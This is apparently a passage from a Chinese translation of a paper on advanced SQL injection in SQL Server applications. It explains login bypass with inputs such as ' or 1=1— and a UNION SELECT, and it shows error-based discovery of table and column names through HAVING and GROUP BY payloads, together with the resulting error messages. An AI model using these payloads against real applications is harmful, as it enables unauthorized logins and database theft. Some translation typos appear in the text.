[Sql server]应用程序中的高级SQL注入(4)

攻击者可以只需提供他们知道的用户名，就可以以任何用户登陆，使用如下输入：

Username：admin'—

攻击者可以使用users表中第一个用户，输入如下：

Username：' or 1=1—

更特别地，攻击者可以使用完全虚构的用户登陆，输入如下：

Username：' union select 1,'fictional_user','some_password',1—

这种结果的原因是应用程序相信攻击者指定的是从数据库中返回结果的一部分。

通过错误消息获得信息

这个几乎是David Litchfield首先发现的，并且通过作者渗透测试的；后来David写了一份文档，后来作者参考了这份文档。这些解释讨论了‘错误消息‘潜在的机制，使读者能够完全地了解它，潜在地引发他们的能力。

为了操作数据库中的数据，攻击者必须确定某些数据库和某些表的结构。例如我们可以使用如下语句创建user表：

Create talbe users(

Id int,

Username varchar(255),

Password varchar(255),

Privs int

)

然后将下面的用户插入到users表中：

Insert into users values(0,'admin','r00tr0x!',0xffff)

Insert into users values(0,'guest','guest',0x0000)

Insert into users values(0,'chris','password',0x00ff)

Insert into users values(0,'fred','sesame',0x00ff)

如果我们的攻击者想插入一个自己的用户。在不知道users表结构的情况下，他不可能成功。即使他比较幸运，至于privs字段不清楚。攻击者可能插入一个'1'，这样只给他自己一个低权限的用户。

幸运地，如果从应用程序（默认为ASP行为）返回错误消息，那么攻击者可以确定整个数据库的结构，并且可以以程序中连接SQLSERVER的权限度曲任何值。

（下面以一个简单的数据库和asp脚本来举例说明他们是怎么工作的）

首先，攻击者想获得建立用户的表的名字和字段的名字，要做这些，攻击者需要使用select语法的having子句：

Username：' having 1=1—

这样将会出现如下错误：

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/process_login.asp, line 35

因此现在攻击者知道了表的名字和第一个地段的名字。他们仍然可以通过把字段放到group by子句只能感去找到一个一个字段名，如下：

Username：' group by users.id having 1=1—

出现的错误如下：

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.